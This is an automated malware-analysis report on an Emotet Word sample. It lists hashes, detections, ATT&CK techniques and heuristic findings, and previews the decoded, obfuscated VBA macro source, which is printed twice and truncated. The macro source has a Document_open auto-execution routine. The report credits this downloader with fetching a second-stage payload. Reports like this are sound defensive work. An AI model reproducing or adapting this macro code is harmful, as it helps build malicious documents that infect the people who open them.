Emotet Office (OLE) malware analysis — malicious · 9d0d36f990055211

MALICIOUS

Office (OLE)

177.6 KB Created: 2019-12-12 06:49:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: 1f33087d89592024e75bd229f7054a6f SHA-1: 623fbf1df0bbde30cfd79005c9fa3e90235e2d1f SHA-256: 9d0d36f990055211037b5df654cec57d522f32ef6c37c40d2a649d8a30bb0808

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for Emotet. The ClamAV detection explicitly names Emotet. The obfuscated VBA code likely attempts to download and execute a second-stage payload, a hallmark of Emotet's downloader functionality.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-7447388-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7447388-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8795 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8795 bytes
SHA-256: `e0e3eb9a1480364c8dea8a6196ffcb26c0d93e7a1f7dc790d831f7cc3f008ea7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Lybqoogsdhw" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Cienkxwpvfebq, 0, 0, MSForms, TextBox" Private Sub Document_open() For Hlnjwdhwyqrgn = Izdprgoelwdy To 0 For Rbmsryfk = Dhzxckniuilj To 0 Prtgbnsfu = (23 + Round(WOJOkxR3)) Next Ofowxnxrl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Gqbbivedri = uzH To MZDUoaj1 Dzfyiuzym = ChrB(dANsZ68a4) Next For Nezmwunrcvf = 0 To 0 Eaexbqcy = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next For Dofkwobhnjs = Rgouokauq To 0 For Mvnwfqsblwmn = Fdumpvmfolkof To 0 Utnlmxbbecxq = (23 + Round(WOJOkxR3)) Next Jesxxihg = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Igggbmqk = uzH To MZDUoaj1 Rdzcezebp = ChrB(dANsZ68a4) Next For Evcfgrrhgnnl = 0 To 0 Gqvzrlmn = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next For Zcwpxanwc = Liictgefpd To 0 For Zrlckotgbjmrs = Grlfkfcqk To 0 Aqgapdmgwxmyc = (23 + Round(WOJOkxR3)) Next Nibvqkazyo = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Crxaarlnczatj = uzH To MZDUoaj1 Wittixbrto = ChrB(dANsZ68a4) Next For Oaqhmlgjozwl = 0 To 0 Ufoiimlydre = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next Nlllsalbwscg End Sub Attribute VB_Name = "Fdktbacaoogfd" Attribute VB_Base = "0{2CE796BC-315F-490A-A1BF-FE393A0F89CC}{005C3DCB-A0AF-4E3D-AC1A-2CE7964EBA6E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Fuqosmjgrsnid" Function Ldlexyte() For Yxcgphts = Ugjmkcrcfrv To 0 For Fhzhmcqedog = Eqdxovrbtimgm To 0 Awqhliwzpahp = (23 + Round(WOJOkxR3)) Next Rsdgmxayhc = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Mmznazryegxy = uzH To MZDUoaj1 Hqnxhgsqcpj = ChrB(dANsZ68a4) Next For Nrbpniqv = 0 To 0 Czhyahkv = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next Hvdzmohxgrs = Lybqoogsdhw.Cienkxwpvfebq For Nzeyjqdcenou = Blgbziln To 0 For Htmrhuuokfyl = Gimtbnyrwypi To 0 Msfaimqpelvks = (23 + Round(WOJOkxR3)) Next Qeqcmvqwsl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Pxncycxbrzyd = uzH To MZDUoaj1 Qdayrvxi = ChrB(dANsZ68a4) Next For Ygfbwwnoetbs = 0 To 0 Xiuyrqgnfi = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next Eddiblqzt = Hvdzmohxgrs + Fdktbacaoogfd.Urmsbswtr + Fdktbacaoogfd.Ishapsxghjg + Fdktbacaoogfd.Cfidacdylj For Ycgukqwaroiwa = Bdyqmpjywbl To 0 For Uwjkrwmfpv = Vqjlnxsfqff To 0 Zgoektzhmfufy = (23 + Round(WOJOkxR3)) Next Whlhgarz = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Idscuprkmr = uzH To MZDUoaj1 Bfcsijkogpspj = ChrB(dANsZ68a4) Next For Xsyihorbqhfr = 0 To 0 Umnnyfgf = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next Ekalgrwwelf = Eddiblqzt + Fdktbacaoogfd.Nlnpekfzejxq + Fdktbacaoogfd.Sxvcssgvjusk.ControlTipText For Hqlzcifbw = Lydqkxcpq To 0 For Dxlgrpvp = Emuyewxnleela To 0 Isysejgh = (23 + Round(WOJOkxR3)) Next Onwrpfhqlgm = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Fafcfvyrxndi = uzH To MZDUoaj1 Wbmyfplqibwvy = ChrB(dANsZ68a4) Next For Orqyatrzhalf = 0 To 0 Zsisjkozihu = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next Ldlexyte = Ilysyduuew + Ekalgrwwelf + Ilysyduuew For Rfcqhhhvuyu = Nqzijhok To 0 ... (truncated)

SHA-256: e0e3eb9a1480364c8dea8a6196ffcb26c0d93e7a1f7dc790d831f7cc3f008ea7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Lybqoogsdhw"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Cienkxwpvfebq, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Hlnjwdhwyqrgn = Izdprgoelwdy To 0
      For Rbmsryfk = Dhzxckniuilj To 0
         Prtgbnsfu = (23 + Round(WOJOkxR3))
      Next
      Ofowxnxrl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Gqbbivedri = uzH To MZDUoaj1
         Dzfyiuzym = ChrB(dANsZ68a4)
         Next
      For Nezmwunrcvf = 0 To 0
         Eaexbqcy = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Dofkwobhnjs = Rgouokauq To 0
      For Mvnwfqsblwmn = Fdumpvmfolkof To 0
         Utnlmxbbecxq = (23 + Round(WOJOkxR3))
      Next
      Jesxxihg = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Igggbmqk = uzH To MZDUoaj1
         Rdzcezebp = ChrB(dANsZ68a4)
         Next
      For Evcfgrrhgnnl = 0 To 0
         Gqvzrlmn = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Zcwpxanwc = Liictgefpd To 0
      For Zrlckotgbjmrs = Grlfkfcqk To 0
         Aqgapdmgwxmyc = (23 + Round(WOJOkxR3))
      Next
      Nibvqkazyo = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Crxaarlnczatj = uzH To MZDUoaj1
         Wittixbrto = ChrB(dANsZ68a4)
         Next
      For Oaqhmlgjozwl = 0 To 0
         Ufoiimlydre = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Nlllsalbwscg
End Sub

Attribute VB_Name = "Fdktbacaoogfd"
Attribute VB_Base = "0{2CE796BC-315F-490A-A1BF-FE393A0F89CC}{005C3DCB-A0AF-4E3D-AC1A-2CE7964EBA6E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Fuqosmjgrsnid"
Function Ldlexyte()
   For Yxcgphts = Ugjmkcrcfrv To 0
      For Fhzhmcqedog = Eqdxovrbtimgm To 0
         Awqhliwzpahp = (23 + Round(WOJOkxR3))
      Next
      Rsdgmxayhc = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Mmznazryegxy = uzH To MZDUoaj1
         Hqnxhgsqcpj = ChrB(dANsZ68a4)
         Next
      For Nrbpniqv = 0 To 0
         Czhyahkv = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Hvdzmohxgrs = Lybqoogsdhw.Cienkxwpvfebq
   For Nzeyjqdcenou = Blgbziln To 0
      For Htmrhuuokfyl = Gimtbnyrwypi To 0
         Msfaimqpelvks = (23 + Round(WOJOkxR3))
      Next
      Qeqcmvqwsl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Pxncycxbrzyd = uzH To MZDUoaj1
         Qdayrvxi = ChrB(dANsZ68a4)
         Next
      For Ygfbwwnoetbs = 0 To 0
         Xiuyrqgnfi = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Eddiblqzt = Hvdzmohxgrs + Fdktbacaoogfd.Urmsbswtr + Fdktbacaoogfd.Ishapsxghjg + Fdktbacaoogfd.Cfidacdylj
   For Ycgukqwaroiwa = Bdyqmpjywbl To 0
      For Uwjkrwmfpv = Vqjlnxsfqff To 0
         Zgoektzhmfufy = (23 + Round(WOJOkxR3))
      Next
      Whlhgarz = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Idscuprkmr = uzH To MZDUoaj1
         Bfcsijkogpspj = ChrB(dANsZ68a4)
         Next
      For Xsyihorbqhfr = 0 To 0
         Umnnyfgf = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Ekalgrwwelf = Eddiblqzt + Fdktbacaoogfd.Nlnpekfzejxq + Fdktbacaoogfd.Sxvcssgvjusk.ControlTipText
   For Hqlzcifbw = Lydqkxcpq To 0
      For Dxlgrpvp = Emuyewxnleela To 0
         Isysejgh = (23 + Round(WOJOkxR3))
      Next
      Onwrpfhqlgm = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Fafcfvyrxndi = uzH To MZDUoaj1
         Wbmyfplqibwvy = ChrB(dANsZ68a4)
         Next
      For Orqyatrzhalf = 0 To 0
         Zsisjkozihu = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Ldlexyte = Ilysyduuew + Ekalgrwwelf + Ilysyduuew
   For Rfcqhhhvuyu = Nqzijhok To 0

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.